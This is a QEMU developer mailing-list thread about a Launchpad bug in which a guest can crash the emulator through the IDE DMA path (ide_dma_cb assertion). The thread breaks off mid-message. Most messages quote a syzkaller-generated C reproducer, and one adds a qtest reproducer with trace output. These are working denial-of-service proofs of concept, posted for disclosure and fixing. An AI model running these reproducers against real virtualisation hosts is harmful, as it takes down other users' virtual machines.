* [Qemu-devel] [Bug 1777315] [NEW] Denial of service
@ 2018-06-17 11:17 icytxw
2018-06-17 11:48 ` [Qemu-devel] [Bug 1777315] " icytxw
` (8 more replies)
0 siblings, 9 replies; 10+ messages in thread
From: icytxw @ 2018-06-17 11:17 UTC (permalink / raw)
To: qemu-devel
Public bug reported:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
** Affects: qemu
Importance: Undecided
Assignee: icytxw (icytxw)
Status: New
** Changed in: qemu
Assignee: (unassigned) => icytxw (icytxw)
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
New
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Qemu-devel] [Bug 1777315] Re: Denial of service
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
@ 2018-06-17 11:48 ` icytxw
2018-06-18 5:52 ` Thomas Huth
` (7 subsequent siblings)
8 siblings, 0 replies; 10+ messages in thread
From: icytxw @ 2018-06-17 11:48 UTC (permalink / raw)
To: qemu-devel
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
New
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Qemu-devel] [Bug 1777315] Re: Denial of service
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
2018-06-17 11:48 ` [Qemu-devel] [Bug 1777315] " icytxw
@ 2018-06-18 5:52 ` Thomas Huth
2018-06-18 6:17 ` icytxw
` (6 subsequent siblings)
8 siblings, 0 replies; 10+ messages in thread
From: Thomas Huth @ 2018-06-18 5:52 UTC (permalink / raw)
To: qemu-devel
Are you going to provide a patch for this to the mailing list? (since
you've assigned the bug to yourself)
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
New
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Qemu-devel] [Bug 1777315] Re: Denial of service
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
2018-06-17 11:48 ` [Qemu-devel] [Bug 1777315] " icytxw
2018-06-18 5:52 ` Thomas Huth
@ 2018-06-18 6:17 ` icytxw
2018-06-18 18:10 ` Amol Surati
` (5 subsequent siblings)
8 siblings, 0 replies; 10+ messages in thread
From: icytxw @ 2018-06-18 6:17 UTC (permalink / raw)
To: qemu-devel
Oh no, this is a misunderstanding.
More Details:
use this script https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh create
wheezy.img
than run:
qemu-system-x86_64 -m 2048 -smp 1 -net nic -net user,host=10.0.2.10,hostfwd=tcp::59199-:22 -display none -serial stdio -no-reboot -enable-kvm -hda /home/icy/linux-master/wheezy.img -snapshot -kernel /home/icy/linux-master/arch/x86/boot/bzImage -append "console=ttyS0 earlyprintk=serial oops=panic nmi_watchdog=panic panic_on_warn=1 panic=86400 ftrace_dump_on_oops=orig_cpu rodata=n vsyscall=native net.ifnames=0 biosdevname=0 kvm-intel.nested=1 kvm-intel.unrestricted_guest=1 kvm-intel.vmm_exclusive=1 kvm-intel.fasteoi=1 kvm-intel.ept=1 kvm-intel.flexpriority=1 kvm-intel.vpid=1 kvm-intel.emulate_invalid_guest_state=1 kvm-intel.eptad=1 kvm-intel.enable_shadow_vmcs=1 kvm-intel.pml=1 kvm-intel.enable_apicv=1 root=/dev/sda"
bzImage is obtained by compiling v4.17 kernel(I am not sure if it works
in other kernel version).
than execute the program in the virtual machine: ./repro
qemu will crash, output innformation:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
this bug influences at least qemu-2.9.94 - qemu-2.12.0.
** Changed in: qemu
Assignee: icytxw (icytxw) => (unassigned)
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
New
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Qemu-devel] [Bug 1777315] Re: Denial of service
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
` (2 preceding siblings ...)
2018-06-18 6:17 ` icytxw
@ 2018-06-18 18:10 ` Amol Surati
2018-06-19 13:55 ` John Snow
` (4 subsequent siblings)
8 siblings, 0 replies; 10+ messages in thread
From: Amol Surati @ 2018-06-18 18:10 UTC (permalink / raw)
To: qemu-devel
A repro for the bug is setup at https://github.com/asurati/1777315,
although the rfc-patch that was sent yesterday is pending testing.
Unless qemu-devel advises otherwise, I am available to test and present
it as a bugfix, by tomorrow.
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
New
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Qemu-devel] [Bug 1777315] Re: Denial of service
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
` (3 preceding siblings ...)
2018-06-18 18:10 ` Amol Surati
@ 2018-06-19 13:55 ` John Snow
2019-05-06 16:26 ` Marco Elver
` (3 subsequent siblings)
8 siblings, 0 replies; 10+ messages in thread
From: John Snow @ 2018-06-19 13:55 UTC (permalink / raw)
To: qemu-devel
** Changed in: qemu
Assignee: (unassigned) => John Snow (jnsnow)
** Changed in: qemu
Status: New => In Progress
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
In Progress
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Qemu-devel] [Bug 1777315] Re: Denial of service
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
` (4 preceding siblings ...)
2018-06-19 13:55 ` John Snow
@ 2019-05-06 16:26 ` Marco Elver
2020-07-11 19:08 ` Alexander Bulekov
` (2 subsequent siblings)
8 siblings, 0 replies; 10+ messages in thread
From: Marco Elver @ 2019-05-06 16:26 UTC (permalink / raw)
To: qemu-devel
FYI: we've hit this as will with syzkaller testing; this is still
reproducible as-is with latest qemu (commit a6ae238), and the latest
Linux kernel (5.1-rc7).
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
In Progress
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Bug 1777315] Re: Denial of service
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
` (5 preceding siblings ...)
2019-05-06 16:26 ` Marco Elver
@ 2020-07-11 19:08 ` Alexander Bulekov
2020-07-28 1:30 ` [Bug 1777315] Re: IDE short PRDT abort John Snow
2021-04-30 16:57 ` Thomas Huth
8 siblings, 0 replies; 10+ messages in thread
From: Alexander Bulekov @ 2020-07-11 19:08 UTC (permalink / raw)
To: qemu-devel
Here's a qtest reproducer:
./i386-softmmu/qemu-system-i386 -M pc,accel=qtest \
-qtest null -nographic -vga qxl -qtest stdio \
-drive if=none,id=drive0,file=null-co://,file.read-zeroes=on,format=raw \
-drive if=none,id=drive1,file=null-co://,file.read-zeroes=on,format=raw \
-device ide-cd,drive=drive0 -device ide-hd,drive=drive1 -nodefaults \
< attachment
With -trace ide*:
[R +0.020410] outw 0x171 0xffff
28186@1594494474.407743:ide_ioport_write IDE PIO wr @ 0x171 (Features); val 0xff; bus 0x55e383419100 IDEState 0x55e383419188
28186@1594494474.407747:ide_ioport_write IDE PIO wr @ 0x172 (Sector Count); val 0xff; bus 0x55e383419100 IDEState 0x55e383419188
OK
[S +0.020428] OK
[R +0.020433] outw 0x176 0x35fb
28186@1594494474.407756:ide_ioport_write IDE PIO wr @ 0x176 (Device/Head); val 0xfb; bus 0x55e383419100 IDEState 0x55e383419188
28186@1594494474.407757:ide_ioport_write IDE PIO wr @ 0x177 (Command); val 0x35; bus 0x55e383419100 IDEState 0x55e383419558
28186@1594494474.407759:ide_exec_cmd IDE exec cmd: bus 0x55e383419100; state 0x55e383419558; cmd 0x35
....
28186@1594494474.411019:ide_dma_cb IDEState 0x55e383419558; sector_num=1 n=511 cmd=DMA WRITE
OK
[S +0.023732] OK
[R +0.023736] outb 0x376 0x8f
28186@1594494474.411060:ide_cmd_write IDE PIO wr @ 0x376 (Device Control); val 0x8f; bus 0x55e383419100
OK
[S +0.023741] OK
[R +0.023742] outw 0x376 0x2779
28186@1594494474.411064:ide_cmd_write IDE PIO wr @ 0x376 (Device Control); val 0x79; bus 0x55e383419100
OK
[S +0.023745] OK
qemu-system-i386: /home/alxndr/Development/qemu/hw/ide/core.c:880: void ide_dma_cb(void *, int): Assertion `n * 512 == s->sg.size' failed.
** Attachment added: "attachment"
https://bugs.launchpad.net/qemu/+bug/1777315/+attachment/5391760/+files/attachment
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
Denial of service
Status in QEMU:
In Progress
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
^ permalink raw reply [flat|nested] 10+ messages in thread
* [Bug 1777315] Re: IDE short PRDT abort
2018-06-17 11:17 [Qemu-devel] [Bug 1777315] [NEW] Denial of service icytxw
` (6 preceding siblings ...)
2020-07-11 19:08 ` Alexander Bulekov
@ 2020-07-28 1:30 ` John Snow
2021-04-30 16:57 ` Thomas Huth
8 siblings, 0 replies; 10+ messages in thread
From: John Snow @ 2020-07-28 1:30 UTC (permalink / raw)
To: qemu-devel
** Summary changed:
- Denial of service
+ IDE short PRDT abort
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
IDE short PRDT abort
Status in QEMU:
In Progress
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
